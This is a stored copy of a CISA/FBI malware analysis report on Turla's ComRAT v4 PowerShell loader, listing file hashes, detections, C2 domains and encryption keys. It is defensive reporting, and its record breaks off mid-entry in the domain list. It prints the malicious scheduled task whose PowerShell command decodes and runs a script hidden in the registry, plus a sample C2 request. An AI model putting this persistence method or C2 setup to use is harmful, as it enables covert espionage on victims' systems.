{
	"id": "a7368b79-d403-4221-9a41-8da335978d82",
	"created_at": "2026-04-06T02:12:08.642697Z",
	"updated_at": "2026-04-10T03:33:35.645602Z",
	"deleted_at": null,
	"sha1_hash": "04f4526e7cb4d730d6539bf06453471f448d7063",
	"title": "MAR-10310246-2.v1 – PowerShell Script: ComRAT | CISA",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 93180,
	"plain_text": "MAR-10310246-2.v1 – PowerShell Script: ComRAT | CISA\r\nPublished: 2020-10-29 · Archived: 2026-04-06 02:03:39 UTC\r\nNotification\r\nThis report is provided \"as is\" for informational purposes only. The Department of Homeland Security (DHS) does not\r\nprovide any warranties of any kind regarding any information contained herein. The DHS does not endorse any commercial\r\nproduct or service referenced in this bulletin or otherwise.\r\nThis document is marked TLP:WHITE--Disclosure is not limited. Sources may use TLP:WHITE when information carries\r\nminimal or no foreseeable risk of misuse, in accordance with applicable rules and procedures for public release. Subject to\r\nstandard copyright rules, TLP:WHITE information may be distributed without restriction. For more information on the\r\nTraffic Light Protocol (TLP), see http://www.us-cert.gov/tlp.\r\nSummary\r\nDescription\r\nThis Malware Analysis Report (MAR) is the result of analytic efforts between the Cybersecurity and Infrastructure Security\r\nAgency (CISA), the Cyber National Mission Force (CNMF), and the Federal Bureau of Investigation (FBI). The malware\r\nvariant, known as ComRAT, has been used by Turla, a Russian-sponsored Advanced Persistent Threat (APT) actor. CISA,\r\nCNMF, and FBI are distributing this MAR to enable network defense and reduce exposure to malicious activity. This MAR\r\nincludes suggested response actions and recommended mitigation techniques.\r\nFBI has high confidence that Russian-sponsored APT actor Turla, which is an espionage group active for at least a decade, is\r\nusing ComRAT malware to exploit victim networks. The group is well known for its custom tools and targeted operations.\r\nThis report analyzes a PowerShell script that installs a PowerShell script, which will decode and load a 64-bit dynamic-link\r\nlibrary (DLL) identified as ComRAT version 4. This new variant of ComRAT contains embedded 32-bit and 64-bit DLLs\r\nused as communication modules. 
The communication module (32-bit or 64-bit DLL) is injected into the victim system's\r\ndefault browser. The ComRATv4 file and the communication module communicate with each other using a named pipe. The\r\nnamed pipe is used to send Hypertext Transfer Protocol (HTTP) requests and receive HTTP responses to and from the\r\ncommunication module for backdoor commands. It is designed to use a Gmail web interface to receive commands and\r\nexfiltrate data. The ComRAT v4 file contains a Virtual File System (VFS) in File Allocation Table 16 (FAT16) format, which\r\nincludes the configuration and log files.\r\nUsers or administrators should flag activity associated with the malware and report the activity to CISA or the FBI Cyber\r\nWatch (CyWatch), and give the activity the highest priority for enhanced mitigation. For more information on malicious\r\ncyber activity, please visit https://us-cert.cisa.gov/\r\nFor a downloadable copy of IOCs, see: MAR-10310246-2.v1.WHITE.stix.\r\nSubmitted Files (5)\r\n00352afc7e7863530e4d68be35ae8b60261fc57560167645697b7bfc0ac0e93d (Communication_module_32.dll)\r\n134919151466c9292bdcb7c24c32c841a5183d880072b0ad5e8b3a3a830afef8 (corrected.ps1)\r\n166b1fb3d34b32f1807c710aaa435d181aedbded1e7b4539ffa931c2b2cdd405 (Communication_module_64.dll)\r\n44d6d67b5328a4d73f72d8a0f9d39fe4bb6539609f90f169483936a8b3b88316 (ComRATv4.exe)\r\na3170c32c09fc85cdda778a5c20a3dab144b6d1dd9996ba8340866e0081c7642 (Decode_PowerShell.ps1)\r\nDomains (6)\r\nbranter.tk\r\nbronerg.tk\r\ncrusider.tk\r\nduke6.tk\r\nsanitar.ml\r\nwekanda.tk\r\nhttps://www.cisa.gov/uscert/ncas/analysis-reports/ar20-303a\r\nPage 1 of 15\n\nFindings\r\n134919151466c9292bdcb7c24c32c841a5183d880072b0ad5e8b3a3a830afef8\r\nTags\r\ndropper\r\nDetails\r\nName corrected.ps1\r\nSize 4345430 bytes\r\nType Little-endian UTF-16 Unicode text, with very long lines, with CRLF, LF line terminators\r\nMD5 65419948186842f8f3ef07cafb71f59a\r\nSHA1 93537b0814177e2101663306aa17332b9303e08a\r\nSHA256 
134919151466c9292bdcb7c24c32c841a5183d880072b0ad5e8b3a3a830afef8\r\nSHA512 83d093c6febacb11fcde57fee98c2385f628e5cd3629bfabd0f9e4d2c5de18c6336b3d3aff8081b06a827e742876d19ae370e81890c247daac73d4\r\nssdeep 24576:+vq2EYNg0gX792UHDoSe9Ov2a8p+JnHZUoWYWUpcfm3WuPhu/aqJOFKs4Wuw054o:Drr9q0v4ubJmg4OFuwkOM5NZihxs\r\nEntropy 4.004402\r\nAntivirus\r\nNo matches found.\r\nYARA Rules\r\nNo matches found.\r\nssdeep Matches\r\nNo matches found.\r\nRelationships\r\n1349191514... Contains a3170c32c09fc85cdda778a5c20a3dab144b6d1dd9996ba8340866e0081c7642\r\nDescription\r\nThis file is a heavily encoded malicious PowerShell script. It is designed to install a malicious PowerShell script into a\r\nregistry key on the victim system. This malicious script also modifies the following scheduled task on the victim's system:\r\n—Begin Modified Scheduled Task—\r\nC:\\Windows\\System32\\Tasks\\Microsoft\\Windows\\Customer Experience Improvement Program\\Consolidator\r\n—End Modified Scheduled Task—\r\nThe modification of this scheduled task causes the installed malicious PowerShell script to be executed. 
Displayed below is\r\nthe original scheduled task:\r\n—Begin Original Scheduled Task—\r\n\u003c?xml version=\"1.0\" encoding=\"UTF-16\"?\u003e\r\n\u003cTask xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\"\u003e\r\n\u003cRegistrationInfo\u003e\r\n   \u003cVersion\u003e1.0\u003c/Version\u003e\r\n   \u003cSecurityDescriptor\u003eD:(A;OICI;FA;;;BA)(A;OICI;FA;;;SY)(A;OICI;GRGX;;;AU)\u003c/SecurityDescriptor\u003e\r\n   \u003cSource\u003e$(@%systemRoot%\\system32\\wsqmcons.exe,-106)\u003c/Source\u003e\r\n   \u003cAuthor\u003e$(@%systemRoot%\\system32\\wsqmcons.exe,-108)\u003c/Author\u003e\r\n   \u003cDescription\u003e$(@%systemRoot%\\system32\\wsqmcons.exe,-107)\u003c/Description\u003e\r\n   \u003cURI\u003e\\Microsoft\\Windows\\Customer Experience Improvement Program\\Consolidator\u003c/URI\u003e\r\n\u003c/RegistrationInfo\u003e\r\n\u003cPrincipals\u003e\r\n   \u003cPrincipal id=\"WinSQMAccount\"\u003e\r\n    \u003cUserId\u003eS-1-5-18\u003c/UserId\u003e\r\n   \u003c/Principal\u003e\r\n\u003c/Principals\u003e\r\n\u003cSettings\u003e\r\n   \u003cDisallowStartIfOnBatteries\u003efalse\u003c/DisallowStartIfOnBatteries\u003e\r\n   \u003cStopIfGoingOnBatteries\u003efalse\u003c/StopIfGoingOnBatteries\u003e\r\n   \u003cMultipleInstancesPolicy\u003eIgnoreNew\u003c/MultipleInstancesPolicy\u003e\r\n   \u003cStartWhenAvailable\u003etrue\u003c/StartWhenAvailable\u003e\r\n   \u003cIdleSettings\u003e\r\n    \u003cStopOnIdleEnd\u003etrue\u003c/StopOnIdleEnd\u003e\r\n    \u003cRestartOnIdle\u003efalse\u003c/RestartOnIdle\u003e\r\n   \u003c/IdleSettings\u003e\r\n   \u003cUseUnifiedSchedulingEngine\u003etrue\u003c/UseUnifiedSchedulingEngine\u003e\r\n\u003c/Settings\u003e\r\n\u003cTriggers\u003e\r\n   \u003cTimeTrigger\u003e\r\n    \u003cStartBoundary\u003e2004-01-02T00:00:00\u003c/StartBoundary\u003e\r\n    \u003cRepetition\u003e\r\n       \u003cInterval\u003ePT6H\u003c/Interval\u003e\r\n    
\u003c/Repetition\u003e\r\n   \u003c/TimeTrigger\u003e\r\n\u003c/Triggers\u003e\r\n\u003cActions Context=\"WinSQMAccount\"\u003e\r\n   \u003cExec\u003e\r\n    \u003cCommand\u003e%SystemRoot%\\System32\\wsqmcons.exe\u003c/Command\u003e\r\n   \u003c/Exec\u003e\r\n\u003c/Actions\u003e\r\n\u003c/Task\u003e\r\n—End Original Scheduled Task—\r\nThe scheduled task is then modified by this malicious PowerShell script. Displayed below is the modified scheduled task:\r\n—Begin Modified Scheduled Task—\r\n\u003c?xml version=\"1.0\" encoding=\"UTF-16\"?\u003e\r\n\u003cTask version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\"\u003e\r\n\u003cRegistrationInfo\u003e\r\n   \u003cSource\u003e$(@%systemRoot%\\system32\\wsqmcons.exe,-106)\u003c/Source\u003e\r\n   \u003cAuthor\u003e$(@%systemRoot%\\system32\\wsqmcons.exe,-108)\u003c/Author\u003e\r\n   \u003cVersion\u003e1.0\u003c/Version\u003e\r\n   \u003cDescription\u003e$(@%systemRoot%\\system32\\wsqmcons.exe,-107)\u003c/Description\u003e\r\n   \u003cURI\u003e\\Microsoft\\Windows\\Customer Experience Improvement Program\\Consolidator\u003c/URI\u003e\r\n   \u003cSecurityDescriptor\u003eD:(A;OICI;FA;;;BA)(A;OICI;FA;;;SY)(A;OICI;GRGX;;;AU)\u003c/SecurityDescriptor\u003e\r\n\u003c/RegistrationInfo\u003e\r\n\u003cTriggers\u003e\r\n   \u003cTimeTrigger\u003e\r\n    \u003cRepetition\u003e\r\n       \u003cInterval\u003ePT6H\u003c/Interval\u003e\r\n       \u003cStopAtDurationEnd\u003efalse\u003c/StopAtDurationEnd\u003e\r\n    \u003c/Repetition\u003e\r\n    \u003cStartBoundary\u003e2004-01-02T00:00:00\u003c/StartBoundary\u003e\r\n    \u003cEnabled\u003etrue\u003c/Enabled\u003e\r\n   \u003c/TimeTrigger\u003e\r\n   \u003cLogonTrigger\u003e\r\n    \u003cEnabled\u003etrue\u003c/Enabled\u003e\r\n   \u003c/LogonTrigger\u003e\r\n\u003c/Triggers\u003e\r\n\u003cPrincipals\u003e\r\n   \u003cPrincipal id=\"WinSQMAccount\"\u003e\r\n    \u003cRunLevel\u003eLeastPrivilege\u003c/RunLevel\u003e\r\n    
\u003cUserId\u003eSYSTEM\u003c/UserId\u003e\r\n   \u003c/Principal\u003e\r\n\u003c/Principals\u003e\r\n\u003cSettings\u003e\r\n   \u003cMultipleInstancesPolicy\u003eIgnoreNew\u003c/MultipleInstancesPolicy\u003e\r\n   \u003cDisallowStartIfOnBatteries\u003efalse\u003c/DisallowStartIfOnBatteries\u003e\r\n   \u003cStopIfGoingOnBatteries\u003efalse\u003c/StopIfGoingOnBatteries\u003e\r\n   \u003cAllowHardTerminate\u003etrue\u003c/AllowHardTerminate\u003e\r\n   \u003cStartWhenAvailable\u003etrue\u003c/StartWhenAvailable\u003e\r\n   \u003cRunOnlyIfNetworkAvailable\u003efalse\u003c/RunOnlyIfNetworkAvailable\u003e\r\n   \u003cIdleSettings\u003e\r\n    \u003cStopOnIdleEnd\u003etrue\u003c/StopOnIdleEnd\u003e\r\n    \u003cRestartOnIdle\u003efalse\u003c/RestartOnIdle\u003e\r\n   \u003c/IdleSettings\u003e\r\n   \u003cAllowStartOnDemand\u003etrue\u003c/AllowStartOnDemand\u003e\r\n   \u003cEnabled\u003etrue\u003c/Enabled\u003e\r\n   \u003cHidden\u003efalse\u003c/Hidden\u003e\r\n   \u003cRunOnlyIfIdle\u003efalse\u003c/RunOnlyIfIdle\u003e\r\n   \u003cDisallowStartOnRemoteAppSession\u003efalse\u003c/DisallowStartOnRemoteAppSession\u003e\r\n   \u003cUseUnifiedSchedulingEngine\u003etrue\u003c/UseUnifiedSchedulingEngine\u003e\r\n   \u003cWakeToRun\u003efalse\u003c/WakeToRun\u003e\r\n   \u003cExecutionTimeLimit\u003ePT72H\u003c/ExecutionTimeLimit\u003e\r\n   \u003cPriority\u003e7\u003c/Priority\u003e\r\n\u003c/Settings\u003e\r\n\u003cActions Context=\"WinSQMAccount\"\u003e\r\n   \u003cExec\u003e\r\n    \u003cCommand\u003ecmd.exe\u003c/Command\u003e\r\n    \u003cArguments\u003e/c \"%SystemRoot%\\System32\\wsqmcons.exe \u0026amp; PowerShell.exe -v 2 \"$GS459ea =\r\n'KVYYOBBA4331110uhyicnoor';\r\n[Text.Encoding]::ASCII.GetString([Convert]::\\\"Fr`omBa`se6`4Str`ing\\\"((gp\r\nHKLM:\\SOFTWARE\\Microsoft\\SQMClient\\Windows).WSqmCons))|iex;\r\n\"\"\u003c/Arguments\u003e\r\n   
\u003c/Exec\u003e\r\n\u003c/Actions\u003e\r\n\u003c/Task\u003e\r\n—End Modified Scheduled Task—\r\nThe modification of the scheduled task illustrated below indicates that the primary purpose of this task modification is to\r\ndecode and execute a PowerShell script stored in the WSqmCons value under the registry key\r\nHKLM:\\SOFTWARE\\Microsoft\\SQMClient\\Windows:\r\n—Begin Specific Scheduled Task Module—\r\n\u003cActions Context=\"WinSQMAccount\"\u003e\r\n   \u003cExec\u003e\r\n    \u003cCommand\u003ecmd.exe\u003c/Command\u003e\r\n    \u003cArguments\u003e/c \"%SystemRoot%\\System32\\wsqmcons.exe \u0026amp; PowerShell.exe -v 2 \"$GS459ea =\r\n'KVYYOBBA4331110uhyicnoor';\r\n[Text.Encoding]::ASCII.GetString([Convert]::\\\"Fr`omBa`se6`4Str`ing\\\"((gp\r\nHKLM:\\SOFTWARE\\Microsoft\\SQMClient\\Windows).WSqmCons))|iex;\r\n\"\"\u003c/Arguments\u003e\r\n—End Specific Scheduled Task Module—\r\nThis malicious script installs a PowerShell script\r\n(a3170c32c09fc85cdda778a5c20a3dab144b6d1dd9996ba8340866e0081c7642) into the “WSqmCons” registry value. 
The\r\nprimary purpose of the newly installed PowerShell script is to decode and load a malicious DLL, identified as ComRAT v4\r\n(44d6d67b5328a4d73f72d8a0f9d39fe4bb6539609f90f169483936a8b3b88316), onto the victim's system.\r\na3170c32c09fc85cdda778a5c20a3dab144b6d1dd9996ba8340866e0081c7642\r\nTags\r\ntrojan\r\nDetails\r\nName Decode_PowerShell.ps1\r\nSize 1264496 bytes\r\nType ASCII text, with very long lines, with CRLF, LF line terminators\r\nMD5 0fd79f4c60593f6aae69ff22086c3bb0\r\nSHA1 07f0692c856703d75a9946a0fbb3c0db03f7ac40\r\nSHA256 a3170c32c09fc85cdda778a5c20a3dab144b6d1dd9996ba8340866e0081c7642\r\nSHA512 28a0ae0a779aa88499f70cf97ef9db9482527017ea76ee2e469e4184684c4d4fb0559e50f1721e7e9d02655bee4cdf7b12c62a3d037ea10130121\r\nssdeep 24576:jarQlVyeHtWdf7PyJjwLKWp57+7fb0TLaB7VrE:jD567vs1tm\r\nEntropy 6.091278\r\nAntivirus\r\nAntiy GrayWare/PowerShell.Mimikatz.a\r\nClamAV Win.Trojan.PSempireInj-7013548-0\r\nMicrosoft Security Essentials Trojan:PowerShell/Powersploit.J\r\nNANOAV Trojan.Script.ExpKit.eydujq\r\nSymantec Hacktool.Mimikatz\r\nYARA Rules\r\nNo matches found.\r\nssdeep Matches\r\nNo matches found.\r\nRelationships\r\na3170c32c0... Contained_Within 134919151466c9292bdcb7c24c32c841a5183d880072b0ad5e8b3a3a830afef8\r\na3170c32c0... Dropped 44d6d67b5328a4d73f72d8a0f9d39fe4bb6539609f90f169483936a8b3b88316\r\nDescription\r\nThis heavily encoded PowerShell script is installed by the malicious script “corrected.ps1”\r\n(134919151466c9292bdcb7c24c32c841a5183d880072b0ad5e8b3a3a830afef8). It is designed to decode and load an\r\nembedded DLL which has been identified as a variant of the malware known as ComRAT v4, “ComRATv4.exe”\r\n(44d6d67b5328a4d73f72d8a0f9d39fe4bb6539609f90f169483936a8b3b88316).\r\nRemoval of some of the PowerShell obfuscation reveals the functions illustrated below. 
These functions are used to\r\ndecompress the embedded DLL before it is loaded on the target system:\r\n—Begin PowerShell Helper Functions—\r\n   using System;\r\n   using System.IO;\r\n   using System.IO.Compression;\r\n   public static class CD475bjf{\r\n       public static void DBQ800fc(Stream input, Stream output){byte[] buffer = new byte[16 * 1024];\r\n       int bytesRead;\r\n       while((bytesRead = input.Read(buffer, 0, buffer.Length)) \u003e 0){\r\n           output.Write(buffer, 0, bytesRead);\r\n       }}}\r\n      public static class MAE38aee{\r\n          public static byte[] JZ653jdh(byte[] arrayToCompress){\r\n           using (MemoryStream outStream = new MemoryStream()){using (GZipStream tinyStream = new\r\nGZipStream(outStream, CompressionMode.Compress))using (MemoryStream mStream = new\r\nMemoryStream(arrayToCompress))CD475bjf.DBQ800fc(mStream, tinyStream);\r\n       return outStream.ToArray();\r\n   }}\r\n          public static byte[] PGN255ij(byte[] arrayToDecompress){        \r\n           using (MemoryStream inStream = new MemoryStream(arrayToDecompress))using (GZipStream bigStream = new\r\nGZipStream(inStream, CompressionMode.Decompress))using (MemoryStream bigStreamOut = new MemoryStream())\r\n{CD475bjf.DBQ800fc(bigStream, bigStreamOut);\r\n       return bigStreamOut.ToArray();\r\n   }}}\r\n#decode base64 above\r\n$decompress = [Convert]::FromBase64String($decompressbase64);\r\n#create another text object for use later\r\n$NS70gea = New-Object System.Text.ASCIIEncoding;\r\n#convert base64 decoded value to string\r\n$decompress = $NS70gea.GetString($decompress,0,$decompress.Length);\r\n—End PowerShell Helper Functions—\r\nFigure 1 illustrates a part of the payload embedded within this malicious script. 
The encoded PowerShell script contains an\r\nembedded function named “Run” that can load a DLL directly from memory and inject it into a remote process (Figure 2).\r\nThe PowerShell script injects the embedded ComRAT DLL\r\n(44d6d67b5328a4d73f72d8a0f9d39fe4bb6539609f90f169483936a8b3b88316) into the Windows Explorer process.\r\nScreenshots\r\nFigure 1 - Screenshot of the payload embedded within this malicious script.\r\nFigure 2 - Screenshot of the function used to load a DLL directly from memory and inject it into a remote process.\r\n44d6d67b5328a4d73f72d8a0f9d39fe4bb6539609f90f169483936a8b3b88316\r\nTags\r\ntrojan\r\nDetails\r\nName ComRATv4.exe\r\nSize 1827840 bytes\r\nType PE32+ executable (DLL) (GUI) x86-64, for MS Windows\r\nMD5 faaafa3e115033ba5115ed6a6ba59ba9\r\nSHA1 ca16a95cd38707bad2dc524bb3086b3c0cb3e372\r\nSHA256 44d6d67b5328a4d73f72d8a0f9d39fe4bb6539609f90f169483936a8b3b88316\r\nSHA512 6f2fe02c1e15be2409f89ff1e6ae3c78f87e242ee448fe5ff6d375a74f10c7c6cc01f3f6d796aa34599a891e03c5d421d10f0c041e5a6dc0e346aea3\r\nssdeep 49152:jTRjrgdOU9p1PZH/JNTFTJT5dwIwzQJH:PRCBNTBwAH\r\nEntropy 6.463931\r\nAntivirus\r\nAhnlab Trojan/Win64.Turla\r\nESET a variant of Win64/Turla.BX trojan\r\nYARA Rules\r\nNo matches found.\r\nssdeep Matches\r\nNo matches found.\r\nPE Metadata\r\nCompile Date 2018-03-06 09:38:38-05:00\r\nImport Hash d9d661a606c9d1c23b47672d1067de68\r\nPE Sections\r\nMD5 Name Raw Size Entropy\r\n11525199e6e248e88e0529cf72a9002d header 1024 2.934959\r\n0f3258519a92690d14406e141dcb285b .text 1027584 6.441800\r\nfa4840dc4653443d4574486df39bc6a3 .rdata 481280 4.896843\r\nca22c78d526550925d7843a24cd1d266 .data 264704 7.368343\r\nf7cc8fa49cfa87a125d8354082e162f3 .pdata 47104 6.030652\r\nef6fdd7440f36ba21373b4585a5c83e4 .rsrc 512 4.724729\r\n4f16258cf938a4bc7fe0ae92121f442d .reloc 5632 5.425381\r\nRelationships\r\n44d6d67b53... 
Contains 00352afc7e7863530e4d68be35ae8b60261fc57560167645697b7bfc0ac0e93d\r\n44d6d67b53... Contains 166b1fb3d34b32f1807c710aaa435d181aedbded1e7b4539ffa931c2b2cdd405\r\n44d6d67b53... Dropped_By a3170c32c09fc85cdda778a5c20a3dab144b6d1dd9996ba8340866e0081c7642\r\nDescription\r\nThis application is a 32-bit Windows DLL that has been identified as a module of ComRAT v4. The DLL is loaded into\r\nWindows Explorer (Explorer.exe) by a ComRAT PowerShell loader\r\n(a3170c32c09fc85cdda778a5c20a3dab144b6d1dd9996ba8340866e0081c7642). When executed, it checks the victim's\r\nsystem day/time and performs code execution between 9 AM and 5 PM, Monday through Friday. During execution, it installs\r\nthe following files into the %TEMP% folder:\r\n--Begin files--\r\n\"%TEMP%\\iecache.bin\" ==\u003e an AES-256-XTS encrypted VFS in FAT16 format, containing the malware configuration and\r\nthe log files. (The encryption key is generated during runtime and stored in the Windows registry).\r\n\"%TEMP%\\FSAPIDebugLogFile.txt\"\r\n--End files--\r\nThe malware injects an embedded communication module\r\n(00352afc7e7863530e4d68be35ae8b60261fc57560167645697b7bfc0ac0e93d or\r\n166b1fb3d34b32f1807c710aaa435d181aedbded1e7b4539ffa931c2b2cdd405) into the victim system's default browser and\r\nexecutes it. This file and the communication module communicate with each other using a named pipe. The malware uses\r\nthe named pipe to send HTTP requests and receive HTTP responses to and from the communication module for backdoor\r\ncommands. It is designed to use the Gmail web interface to receive commands and exfiltrate data.\r\nIllustrated below are sample data observed in the decrypted VFS in FAT16 format. 
Some of these files can be updated in the\r\nVFS using backdoor commands.\r\n--Begin sample data in the VFS --\r\n\"/etc/pal/\" contains a list of C2 domains: \"bronerg.tk|crusider.tk|duke6.tk\"\r\n\"/etc/gal.bin\" contains a list of C2 domains: \"sanitar.ml|wekanda.tk|branter.tk\"\r\n\"/etc/pki/aes_key.pki\" : Contains the Advanced Encryption Standard (AES) encryption keys for the C2 communications:\r\n--Begin AES key--\r\n4F8112E9E5AB5391C584D567B58E539F0400094A83EA0C2DDC7FA455FCF447B1\r\n--End AES key--\r\n\"/etc/pki/public_cert.pki\" contains the Rivest–Shamir–Adleman (RSA) encryption key used for the C2 communications:\r\n--Begin RSA key--\r\nBE51E00093CEB0A5FCAE59EB4EEEB3079D1CB17FC195321587CB513003826917B0BC13EB3B9A4209A4FFAF19C07249D360F447A6FAE3936\r\n--End RSA key--\r\nIt uses public key cryptography with RSA and AES encrypted email attachments for its Gmail C2 channel.\r\n\"/etc/mail/subj_dict\" contains the Subject strings \"Re: |RE: |FW: |FWD: | Fw: | Fwd:| FYI: |FYIP |NRN: | NT: | N/T | n/t| NB\r\n|NM| n/m |N/M: |*n/m*\"\r\n\"/etc/php_storage/GET/DEF/server.txt \" and \"/etc/php_storage/POST/DEF/server.txt\" contain the server IP \"172.22.150.125\".\r\n--End sample data in the VFS --\r\nScreenshots\r\nFigure 3 - The first bytes of the decrypted VFS in FAT16 format.\r\nFigure 4 - The decrypted VFS hierarchy, containing the malware configuration and the log files.\r\n00352afc7e7863530e4d68be35ae8b60261fc57560167645697b7bfc0ac0e93d\r\nTags\r\nbackdoor\r\ndownloader\r\nloader\r\ntrojan\r\nDetails\r\nName Communication_module_32.dll\r\nSize 61440 bytes\r\nType PE32 executable (DLL) (GUI) Intel 80386, for MS Windows\r\nMD5 e509c3a40045d2dab9404240f3f201ed\r\nSHA1 86f747cac3b16ed2dab6d9f72a347145ff7a850d\r\nSHA256 00352afc7e7863530e4d68be35ae8b60261fc57560167645697b7bfc0ac0e93d\r\nSHA512 
f78827b6fc258f4a63dd17fec2acb7114329a9d7fd426c72838f2e5e5c54c12fce7be7a0eb9c7e7e74b01fe80c42293ef89c3bcbafd230a68f9639e\r\nssdeep 1536:zlAjaBOUFoD0C8YQ7aZS7C2kkAxWzg39xa3cdjrH++:zl2uOUG0CBQ7aZS7C3uzg39xEM\r\nEntropy 5.338807\r\nAntivirus\r\nAntiy Trojan[Backdoor]/Win32.Turla\r\nAvira TR/Crypt.XPACK.Gen3\r\nESET a variant of Win32/Turla.EO trojan\r\nIkarus Trojan-Downloader.Win32.Farfli\r\nNANOAV Trojan.Win32.Turla.hlrzcr\r\nSymantec Heur.AdvML.B\r\nYARA Rules\r\nNo matches found.\r\nssdeep Matches\r\nNo matches found.\r\nPE Metadata\r\nCompile Date 2018-03-06 09:36:54-05:00\r\nImport Hash 87ab41c57e95562a3e81f0609398b278\r\nPE Sections\r\nMD5 Name Raw Size Entropy\r\nb9bd1636e8c11ff1ab2368771e89cfac header 4096 0.612975\r\n077bf2412ba289da7b6261ffec65988d .text 49152 6.051754\r\n1c95870051ff12b740487ff93d19ef3b .rdata 4096 0.317233\r\nb86e403ac8c58a013fe4cda6b6715804 .reloc 4096 0.019202\r\nRelationships\r\n00352afc7e... Contained_Within 44d6d67b5328a4d73f72d8a0f9d39fe4bb6539609f90f169483936a8b3b88316\r\n00352afc7e... Connected_To branter.tk\r\n00352afc7e... Connected_To wekanda.tk\r\n00352afc7e... Connected_To sanitar.ml\r\n00352afc7e... Connected_To duke6.tk\r\n00352afc7e... Connected_To bronerg.tk\r\n00352afc7e... Connected_To crusider.tk\r\nDescription\r\nThis application is a 32-bit Windows DLL that has been identified as the communication module injected into the victim's\r\nsystem default browser by \"ComRATv4.exe\"\r\n(44d6d67b5328a4d73f72d8a0f9d39fe4bb6539609f90f169483936a8b3b88316). It is designed to use HTTP and a Gmail\r\nweb interface for C2. 
It attempts to connect to the following C2 domains using secure connections:\r\n--Begin list of domains--\r\nbronerg.tk\r\ncrusider.tk\r\nduke6.tk\r\nsanitar.ml\r\nwekanda.tk\r\nbranter.tk\r\n--End list of domains--\r\nDisplayed below is a sample request header:\r\n--Begin header--\r\nCONNECT bronerg[.]tk:443 HTTP/1.0\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2;\r\n.NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)\r\nHost: bronerg.tk:443\r\nContent-Length: 0\r\nConnection: Keep-Alive\r\n--End header--\r\nbronerg.tk\r\nTags\r\ncommand-and-control\r\nWhois\r\nDomain name:\r\n    BRONERG.TK\r\nOrganisation:\r\n    Freedom Registry, Inc.\r\n    2225 East Bayshore Road #290\r\n    Palo Alto CA 94303\r\n    United States\r\n    Phone: +1 650-681-4172\r\n    Fax: +1 650-681-4173\r\nDomain Nameservers:\r\n    NS01.FREENOM.COM\r\n    NS02.FREENOM.COM\r\n    NS03.FREENOM.COM\r\n    NS04.FREENOM.COM\r\nRelationships\r\nbronerg.tk Connected_From 166b1fb3d34b32f1807c710aaa435d181aedbded1e7b4539ffa931c2b2cdd405\r\nbronerg.tk Connected_From 00352afc7e7863530e4d68be35ae8b60261fc57560167645697b7bfc0ac0e93d\r\nDescription\r\nComRAT v4 C2 domain.\r\ncrusider.tk\r\nTags\r\ncommand-and-control\r\nPorts\r\n443 TCP\r\nWhois\r\nDomain name:\r\n    CRUSIDER.TK\r\nOrganisation:\r\n    Freedom Registry, Inc.\r\n    2225 East Bayshore Road #290\r\n    Palo Alto CA 94303\r\n    United States\r\n    Phone: +1 650-681-4172\r\n    Fax: +1 650-681-4173\r\nDomain Nameservers:\r\n    NS01.FREENOM.COM\r\n    NS02.FREENOM.COM\r\n    NS03.FREENOM.COM\r\n    NS04.FREENOM.COM\r\nRelationships\r\ncrusider.tk Connected_From 166b1fb3d34b32f1807c710aaa435d181aedbded1e7b4539ffa931c2b2cdd405\r\ncrusider.tk Connected_From 00352afc7e7863530e4d68be35ae8b60261fc57560167645697b7bfc0ac0e93d\r\nDescription\r\nComRAT v4 C2 
domain.\r\nduke6.tk\r\nTags\r\ncommand-and-control\r\nWhois\r\nDomain name:\r\n    DUKE6.TK\r\nOrganisation:\r\n    Freedom Registry, Inc.\r\n    2225 East Bayshore Road #290\r\n    Palo Alto CA 94303\r\n    United States\r\n    Phone: +1 650-681-4172\r\n    Fax: +1 650-681-4173\r\nDomain Nameservers:\r\n    NS01.FREENOM.COM\r\n    NS02.FREENOM.COM\r\n    NS03.FREENOM.COM\r\n    NS04.FREENOM.COM\r\nRelationships\r\nduke6.tk Connected_From 00352afc7e7863530e4d68be35ae8b60261fc57560167645697b7bfc0ac0e93d\r\nduke6.tk Connected_From 166b1fb3d34b32f1807c710aaa435d181aedbded1e7b4539ffa931c2b2cdd405\r\nDescription\r\nComRAT v4 C2 domain.\r\nsanitar.ml\r\nTags\r\ncommand-and-control\r\nWhois\r\nDomain name:\r\n    SANITAR.ML\r\nOrganisation:\r\n    Freedom Registry, Inc.\r\n    2225 East Bayshore Road #290\r\n    Palo Alto CA 94303\r\n    United States\r\n    Phone: +1 650-681-4172\r\n    Fax: +1 650-681-4173\r\nDomain Nameservers:\r\n    NS01.FREENOM.COM\r\n    NS02.FREENOM.COM\r\n    NS03.FREENOM.COM\r\n    NS04.FREENOM.COM\r\nRelationships\r\nsanitar.ml Connected_From 00352afc7e7863530e4d68be35ae8b60261fc57560167645697b7bfc0ac0e93d\r\nsanitar.ml Connected_From 166b1fb3d34b32f1807c710aaa435d181aedbded1e7b4539ffa931c2b2cdd405\r\nDescription\r\nComRAT v4 C2 domain.\r\nwekanda.tk\r\nTags\r\ncommand-and-control\r\nWhois\r\nDomain name:\r\n    WEKANDA.TK\r\nOrganisation:\r\n    Freedom Registry, Inc.\r\n    2225 East Bayshore Road #290\r\n    Palo Alto CA 94303\r\n    United States\r\n    Phone: +1 650-681-4172\r\n    Fax: +1 650-681-4173\r\nDomain Nameservers:\r\n    NS01.FREENOM.COM\r\n    NS02.FREENOM.COM\r\n    NS03.FREENOM.COM\r\n    NS04.FREENOM.COM\r\nRelationships\r\nwekanda.tk Connected_From 00352afc7e7863530e4d68be35ae8b60261fc57560167645697b7bfc0ac0e93d\r\nwekanda.tk Connected_From 
